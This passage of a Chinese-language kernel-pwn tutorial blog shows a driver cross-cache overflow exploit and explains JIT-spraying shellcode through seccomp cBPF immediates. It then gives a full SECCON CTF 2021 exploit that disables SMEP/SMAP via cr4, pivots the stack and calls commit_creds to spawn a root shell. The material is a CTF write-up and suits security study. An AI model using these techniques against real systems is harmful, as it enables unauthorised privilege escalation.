void alloc_vuln_page(int fd, full_page *arr, int page_idx){
assert(!arr[page_idx].in_use);
for(int i = 0; i < ISO_SLAB_LIMIT; i++){
long result = alloc(fd);
if(result < 0){
error_log("Allocation vuln page error...");
}
arr[page_idx].idx[i] = result;
}
arr[page_idx].in_use = true;
}

void edit_vuln_page(int fd, full_page *arr, int page_idx, uint8_t *buf, size_t sz){
assert(arr[page_idx].in_use);
for(int i = 0; i < ISO_SLAB_LIMIT; i++){
long result = edit(fd, arr[page_idx].idx[i], sz, buf);
if(result < 0){
error_log("edit error...");
}
}
}

int main(int argc, char **argv){

info_log("Step I: Open the vulnurability driver...");
int fd = open("/dev/castaway", O_RDONLY);
if(fd < 0){
error_log("Driver open failed!");
}

info_log("Step II: Construct two pipe for communicating in those namespace...");
pipe(sprayfd_child);
pipe(sprayfd_parent);

info_log("Step III: Setting up spray manager in separate namespace...");
if(!fork()){
unshare_setup(getuid(), getgid());
spray_comm_handler();
}
/* For communicating with the fork later */
pipe(rootfd);
char evil[CHUNK_SIZE];
memset(evil, 0, sizeof(evil));

info_log("Step IV: Draining Start!");
puts("[*]draining cred_jar...");
for(int i = 0; i < CRED_JAR_INITIAL_SPRAY; i++){
pid_t result = fork();
if(!result){
just_wait();
}
if(result < 0){
error_log("fork limit...");
}
}
puts("[*]draining Buddysystem, of course order 0 :)");
for(int i = 0; i < INITIAL_PAGE_SPRAY; i++){
send_spray_cmd(ALLOC_PAGE, i);
}
/* Free the medium one, of many in other words... */
for(int i = 1; i < INITIAL_PAGE_SPRAY; i += 2){
send_spray_cmd(FREE_PAGE, i);
}
for(int i = 0; i < FORK_SPRAY; i++){
pid_t result = __clone(CLONE_FLAGS, &check_and_wait);
if(result < 0){
error_log("clone error...");
}
}
for(int i = 0; i < INITIAL_PAGE_SPRAY; i += 2){
send_spray_cmd(FREE_PAGE, i);
}

*(uint32_t *)&evil[CHUNK_SIZE - 0x6] = 1;
puts("[*]Spraying cross cache overflow...");
for(int i = 0; i < FINAL_PAGE_SPRAY; i++){
alloc_vuln_page(fd, isolation_pages, i);
edit_vuln_page(fd, isolation_pages, i, evil, CHUNK_SIZE);
}
write(rootfd[1], evil, FORK_SPRAY);
sleep(10000);
exit(0);
}

九、shellcode injection

如题,就是shellcode注入,通常是利用bpf系统调用来进行,其全称为 Berkeley Package Filter,我们可以通过该系统调用设置 一定的选项来向内核当中写入可执行代码,我们可以通过该系统调用来为各进程往内核当中创建信息媒介,其中就可以向内和写入类似键值对的集合,除此之外我们向内和注入的代码也可以通过附着在某个进程之上来实现过滤器或者说实现日志的功能,详细学习资料可以参考安全客这位师傅的博客,里面就Linux官方手册进行了翻译与讲解,后续也有相应实验来帮助理解,十分亲民

回到我们的利用当中,由于大部分情况下bpf系统调用需要我们在root权限下才可以使用,因此在我们提权的过程中基本可以告别bpf系统调用,但是也有其他系统调用实现了类似的功能,其中比较广为人知的就是prctl系统调用,也就是众多沙箱手法的一种,通过设置规则来过滤我们的系统调用,而查看源码可以发现它在某条链条上同bpf的后半部分调用是一致的,且都运用到了bpf汇编代码和jit编译技术,其中可以通过设置 PR_SET_SECCOMP来设置一段bpf代码为我们的过滤器,其中大致涉及的系统调用如下:

1
2
3
4
5
6
7
8
9
10
11
12
sys_prctl
prctl_set_seccomp
seccomp_set_mode_filter
seccomp_prepare_user_filter
seccomp_prepare_filter
bpf_prog_create_from_user
bpf_prepare_filter
bpf_migrate_filter
bpf_prog_select_runtime
bpf_int_jit_compile
bpf_jit_binary_alloc
bpf_jit_alloc_exec

这里的大致过程就是,首先我们调用prctl系统调用,这里传入我们的bpf程序,这里注意我们传入的需要时bpf形式的汇编代码,他会被传入到内核内存当中,然后由 bpf_int_jit_compile函数来进行JIT(just in time)编译存于内核,这里介绍一下如何利用其中的规则

这里首先需要介绍一下bpf汇编代码的格式:

原始的bpf汇编指令也被叫做 cBPF(class BPF),他的格式被存放在内核源码中

1
2
3
4
5
6
7
8
9
10
11
/*
* Try and keep these values and structures similar to BSD, especially
* the BPF code definitions which need to match so you can share filters
*/

struct sock_filter { /* Filter block */
__u16 code; /* Actual filter code */
__u8 jt; /* Jump true */
__u8 jf; /* Jump false */
__u32 k; /* Generic multiuse field */
};

可以看到其中的汇编代码code字段占2字节,中间是jump字段我们可以暂时不管,后面就是我们的多用字段,在我们注入漏洞当中,大多情况是将其设置为立即数字段(这里实际上bpf系统调用存在防御机制,那就是在函数 bpf_jit_blind_constants()当中添加的常数致盲机制,从而避免汇编代码中出现原立即数,但是即将涉及到的例题并未开启这一防御机制),这里说明该如何利用,设想一下下面这种情景

首先给出cBPF的基本操作码字段

1
2
3
4
5
6
7
8
#define        BPF_LD        0x00                    //将值cp进寄存器
#define BPF_LDX 0x01
#define BPF_ST 0x02
#define BPF_STX 0x03
#define BPF_ALU 0x04
#define BPF_JMP 0x05
#define BPF_RET 0x06
#define BPF_MISC 0x07

因此如果我们存入大量代码为 [0x00, 0, 0, 0x90909090],那么他在内存当中进行jit编译后会呈现下面这种效果

1
2
3
b8 90 90 90 90			mov eax, 0x90909090
b8 90 90 90 90 mov eax, 0x90909090
...

但这里如果说我们从汇编代码的第二项开始读指令会发生什么呢,他会变成

1
2
3
4
5
6
7
90 			nop
90 nop
90 nop
90 nop
b8 .byte 0xb8
90
...

这里部分达到了一个错位指令的效果,但是这里的0xb8仍然是一个讨厌的地方,那么我们实际上可以选择牺牲一个立即数的位置来使得我们将0xb8翻译成一个新的指令,且该指令要尽量别改变环境当中的取值,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
04 b8                   add    al, 0xb8
0c b8 or al, 0xb8
14 b8 adc al, 0xb8
1c b8 sbb al, 0xb8
24 b8 and al, 0xb8
2c b8 sub al, 0xb8
34 b8 xor al, 0xb8
3c b8 cmp al, 0xb8 *
a8 b8 test al, 0xb8 *
b0 b8 mov al, 0xb8
b1 b8 mov cl, 0xb8
b2 b8 mov dl, 0xb8
b3 b8 mov bl, 0xb8
b4 b8 mov ah, 0xb8
b5 b8 mov ch, 0xb8
b6 b8 mov dh, 0xb8
b7 b8 mov bh, 0xb8

这里直接引入了上面师傅博客当中的示例,其中找到的较为适合的字节就是0x3c,它同0xb8可以搭配成为 cmp al, 0xb8指令,十分适合我们的错位汇编,这样我们每次传入的立即数若带上0x3c就会达成以下效果

1
2
3
4
5
6
7
8
9
10
11
12
b8 3c 90 90 90			mov eax, 0x3c909090
b8 3c 90 90 90 mov eax, 0x3c909090
...

-------------------------------------------

90 nop
90 nop
90 nop
3c b8 cmp al, 0xb8
90 nop
...

因此我们可以善用这里每条汇编多余的3字节来写入我们想要的shellcode,下面介绍例题

例题:SECCON CTF2021

首先查看README.md

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Added to `arch/x86/entry/syscalls/syscall_64.tbl`
```
1337 64 seccon sys_seccon
```

Added to `kernel/sys.c`:
```c
SYSCALL_DEFINE1(seccon, unsigned long, rip)
{
asm volatile("xor %%edx, %%edx;"
"xor %%ebx, %%ebx;"
"xor %%ecx, %%ecx;"
"xor %%edi, %%edi;"
"xor %%esi, %%esi;"
"xor %%r8d, %%r8d;"
"xor %%r9d, %%r9d;"
"xor %%r10d, %%r10d;"
"xor %%r11d, %%r11d;"
"xor %%r12d, %%r12d;"
"xor %%r13d, %%r13d;"
"xor %%r14d, %%r14d;"
"xor %%r15d, %%r15d;"
"xor %%ebp, %%ebp;"
"xor %%esp, %%esp;"
"jmp %0;"
"ud2;"
: : "rax"(rip));
return 0;
}
```

题目并没有给出漏洞模块,这里添加了一个diy的系统调用,可以清空大量寄存器,然后修改rip为我们传入的参数值,

然后就是启动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#!/bin/sh
timeout --foreground 300 qemu-system-x86_64 \
-m 64M \
-nographic \
-kernel bzImage \
-append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on nokaslr" \
-no-reboot \
-cpu kvm64,+smap,+smep \
-smp 1 \
-monitor /dev/null \
-initrd rootfs.cpio \
-net nic,model=virtio \
-net user \
-s

发现开启KPTI、smep、smap,但是没有开启KASLR,所以内核中众多符号我们也都清楚,这里最开始想这利用ret2dir,但是发现这个栈不好迁移,因为只有最多3字节的额外汇编指令可以写入,无法达成 mov rsp 0xffff8880xxxxxxxx这种类似的写法,因此考虑了绕过smep/smap然后将栈迁移到用户区这里

这里首先就是写入bpf汇编指令,我们可以查看prctl系统调用的手册:

1
2
3
4
5
6
7
8
9
10
11
12
13
       PR_SET_SECCOMP (since Linux 2.6.23)
Set the secure computing (seccomp) mode for the calling thread, to limit the available system calls. The more recent seccomp(2) system call provides a superset of the functionality of PR_SET_SECCOMP, and is
the preferred interface for new applications.

The seccomp mode is selected via arg2. (The seccomp constants are defined in <linux/seccomp.h>.) The following values can be specified:

...

SECCOMP_MODE_FILTER (since Linux 3.5)
The allowed system calls are defined by a pointer to a Berkeley Packet Filter passed in arg3. This argument is a pointer to struct sock_fprog; it can be designed to filter arbitrary system calls and
system call arguments. See the description of SECCOMP_SET_MODE_FILTER in seccomp(2).

This operation is available only if the kernel is configured with CONFIG_SECCOMP_FILTER enabled.

这里看到我们的arg1和arg2、arg3都有对应要求,这里man手册贴心的推荐我们阅读seccomp(2)手册,依然继续跟进

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
SECCOMP_SET_MODE_FILTER
The system calls allowed are defined by a pointer to a Berkeley Packet Filter (BPF) passed via args. This argument is a pointer to a struct sock_fprog; it can be designed to filter arbitrary system calls and
system call arguments. If the filter is invalid, seccomp() fails, returning EINVAL in errno.

If fork(2) or clone(2) is allowed by the filter, any child processes will be constrained to the same system call filters as the parent. If execve(2) is allowed, the existing filters will be preserved across a
call to execve(2).

In order to use the SECCOMP_SET_MODE_FILTER operation, either the calling thread must have the CAP_SYS_ADMIN capability in its user namespace, or the thread must already have the no_new_privs bit set. If that
bit was not already set by an ancestor of this thread, the thread must make the following call:

prctl(PR_SET_NO_NEW_PRIVS, 1);

Otherwise, the SECCOMP_SET_MODE_FILTER operation fails and returns EACCES in errno. This requirement ensures that an unprivileged process cannot apply a malicious filter and then invoke a set-user-ID or other
privileged program using execve(2), thus potentially compromising that program. (Such a malicious filter might, for example, cause an attempt to use setuid(2) to set the caller's user IDs to nonzero values to
instead return 0 without actually making the system call. Thus, the program might be tricked into retaining superuser privileges in circumstances where it is possible to influence it to do dangerous things
because it did not actually drop privileges.)


其中提到我们若要使用该标志位需要调用线程的命名空间有着 CAP_SYS_ADMIN的标志,或者说线程将 no_new_privs位设置以下,其中也给出了范例: prctl(PR_SET_NO_NEW_PRIVS, 1)

之后我们可以调试一下看看情况,下面是我们暂且写入的指令,可以看到就是一些雪橇

1
2
3
4
5
6
for(int i = 0; i < BPF_PROG_LEN; i++){
bpf_prog[i].code = 0x00;
bpf_prog[i].jt = 0;
bpf_prog[i].jf = 0;
bpf_prog[i].k = 0x3c909090;
}

因此我们可以大量布置雪橇滑块,然后在较后的代码当中写入我们的shellcode

shellcode的大致过程就是首先设置cr4绕过smep/smap,然后栈迁移到用户区,然后打ROP即可,

exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/bpf.h>
#include <linux/seccomp.h>
#include <linux/filter.h>

#define BPF_PROG_LEN 0x1780/8
#define PAGE_SZ 4096
#define PREARE_KERNEL_CRED 0xffffffff81073c60
#define COMMIT_CREDS 0xffffffff81073ad0
#define SWAPGS_RESTORE 0xffffffff81800e26
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status(){
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("[+]Status has been saved....");
}

void get_shell(){
if(getuid()){
puts("[x]not root");
exit(1);
}
system("/bin/sh");
}

void set_seccomp(char *insn, unsigned int len){
struct sock_fprog{
unsigned short len;
struct sock_filter *filter;
}prog;
prog.len = len;
prog.filter = (struct sock_filter *)insn;
if(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) < 0){
perror("prepare prctl failed!");
exit(1);
}
if(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) < 0){
perror("SET_SECCOMP");
exit(-1);
}
}

void seccon(unsigned long rip){
syscall(1337, rip);
}

void debug(void){
printf("[+]Debugging here!");
getchar();
}


int main(void){
size_t *fake_stack;
size_t start;
int idx;
struct sock_filter* bpf_prog = (struct sock_filter *)malloc(BPF_PROG_LEN * sizeof(struct sock_filter));
save_status();
for(int i = 0; i < BPF_PROG_LEN; i++){
bpf_prog[i].code = 0x00;
bpf_prog[i].jt = 0;
bpf_prog[i].jf = 0;
bpf_prog[i].k = 0x3c909090;
}

bpf_prog[BPF_PROG_LEN - 1].code = 0x06;
bpf_prog[BPF_PROG_LEN - 1].jt = 0;
bpf_prog[BPF_PROG_LEN - 1].jf = 0;
bpf_prog[BPF_PROG_LEN - 1].k = 0x7fff0000;

start = BPF_PROG_LEN - 0x100;
//xor rax,rax;mov ah,0x06;mov al,0xf0;mov cr4,rax
bpf_prog[start++].k = 0x3cc03148;
bpf_prog[start++].k = 0x3c9006b4;
bpf_prog[start++].k = 0x3c90f0b0;
bpf_prog[start++].k = 0x3ce0220f;

//xor rax,rax; mov ah,0x80; mov al,0x00; mov rsp, rax
bpf_prog[start++].k = 0x3cc03148;
bpf_prog[start++].k = 0x3c9090b4;
bpf_prog[start++].k = 0x3c9000b0;

bpf_prog[start++].k = 0x3cc48948;

//push 0; pop rdi; call [rsp]; pop rdx; nop; nop; push rax; pop rdi;ret
bpf_prog[start++].k = 0x3c5f006a;
bpf_prog[start++].k = 0x3c2414ff;
bpf_prog[start++].k = 0x3c90905a;
bpf_prog[start++].k = 0x3cc35f50;

set_seccomp((char *)bpf_prog, BPF_PROG_LEN);
fake_stack = mmap((void *)0x1000, PAGE_SZ*16, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
memset(fake_stack, '\x00', PAGE_SZ*16);
idx = 0x1000;
fake_stack[idx++] = PREARE_KERNEL_CRED;
fake_stack[idx++] = COMMIT_CREDS;
fake_stack[idx++] = SWAPGS_RESTORE;
fake_stack[idx++] = 0xdeadbeef;
fake_stack[idx++] = 0xdeadbeef;
fake_stack[idx++] = (size_t)get_shell;
fake_stack[idx++] = user_cs;
fake_stack[idx++] = user_rflags;
fake_stack[idx++] = user_sp + 8;
fake_stack[idx++] = user_ss;

sleep(1);
seccon(0xffffffffc00009b1);
}

极、参考链接

https://arttnba3.cn/

https://blingblingxuanxuan.github.io/

https://kiprey.gitee.io/2021/10/kernel_pwn_introduction/

http://blog.jcix.top/2018-10-01/userfaultfd_intro/

https://www.willsroot.io/

https://www.anquanke.com/post/id/263803


Linux-Kernel-0x02-Practice
https://peiandhao.github.io/2023/06/24/Linux-Kernel-0x02-Practice/
作者
peiwithhao
发布于
2023年6月24日
许可协议